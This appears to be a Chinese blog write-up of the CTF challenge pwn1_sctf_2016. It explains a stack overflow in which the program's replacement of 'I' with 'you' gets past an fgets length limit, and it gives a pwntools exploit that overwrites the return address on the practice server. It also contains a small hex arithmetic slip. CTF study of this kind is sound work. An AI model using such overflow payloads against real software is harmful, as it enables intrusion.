PWN (3) pwn1_sctf_2016 1

最新推荐文章于 2024-03-27 16:20:09 发布
最新推荐文章于 2024-03-27 16:20:09 发布
阅读量448 收藏
点赞数
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/brightendavid/article/details/116665058
版权
CTF 同时被 2 个专栏收录
22 篇文章 1 订阅
订阅专栏
pwn
3 篇文章 0 订阅
订阅专栏

在这里插入图片描述在这里插入图片描述

查找字符串,发现了一个flag.txt。

输入在这里
限制为32长度的输入
在这里插入图片描述
在这里插入图片描述看到EBP的地址
这个flag的地址是08048F0D

在这里插入图片描述

在这里插入图片描述这个基准位置EBP(0x00000000)的下面一个就是EIP

图示如下,我觉得我已经明白了

±--------------+
|ESP |
±--------------+
| buf |
±--------------+
| 填充物 |
±--------------+
| EBP |
±--------------+
| EIP |
±--------------+
| … …|
| 内存高址 |

S的容量是32.

这里有fget 函数约束,不能输入超过32B的字符
那么要溢出到eip的位置,劫持返回地址,就必须要达到3C的大小。才能够覆盖到eip
原则上是不可能有那么长的,但是后面有一个replace 函数,把’I’替换为了’you’,那么I就是3个长度位了。
在这里插入图片描述0x3C=64=20*3+4

from pwn import *

p = remote('node3.buuoj.cn', '28482')
payload = b'I'* 20+b'a'*0x4+ p32(0x08048F0D)
p.sendline(payload)

p.interactive()
brightendavid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 402
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
pwn1_sctf_2016
weixin_56301399的博客
07-21 1657
这道题目的情况是多了个替换字符的函数,使得一个I在存储中变为you,一个字节变为三字节,这时候需要根据情况确定多少字符使得栈溢出。 还是照常的流程,但题目已经开始变化了,我现在还是一知半解迷迷糊糊的状态,害,菜狗子还需努力。......
buuctf之pwn1_sctf_2016
最新发布
weixin_54452942的博客
03-27 572
简单易懂~
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1414
buuctf:pwnpwn1_sctf_2016(细致分析)
ctf【pwn1_sctf_2016】
HUANGliang_的博客
10-29 196
缓冲区溢出漏洞
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
BUU-pwn1_sctf_2016
qq_45771413的博客
04-27 324
今天补牙,帮学弟改大创,以前的题目还没来得及整理,先补票buu部分的入门pwn题ಥ_ಥ 查看保护 IDA 说来惭愧,太久没做C++写的题现在快看不懂了……只能看出来提示输入,有个I和you的处理,然后将变换拷贝回输入变量,输出 寻找敏感调用: 在字符串查找里找到了全家桶: 解题 这里因为不知道中间咋处理的,直接莽,想溢出s。但是发现s虽然要求输入32,但是栈空间有3C(60位),显然无法溢出。想通过v0搞事情,发现v0是char,而且是地址,显然无法利用……预计关键就在中间的那一串看不懂的了。 在一堆
buu的pwn1_sctf_2016
xieyichensss的博客
03-18 705
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
我要学pwn.day5
weixin_45963786的博客
07-06 380
pwn1_sctf_2016 潜心修炼,从基础开始 这是一道C++的字符串替换后溢出 解题流程 1.查看文件 $ file pwn1_sctf_2016 pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 1995
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
buuctf pwn1_sctf_2016
wp568的博客
10-05 200
看到有.‘rodata:0000000000400684 00000008 C /bin/sh’,点进去看。read()并没有限制输入,显然存在栈溢出漏洞。存在后门函数,函数起始位置400596。拖入IDA,shift+F12查看。
BUUCTF Pwn pwn1_sctf_2016
MrTreebook的博客
12-05 1259
BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 运行一下看看 3.IDA分析 看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 689
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值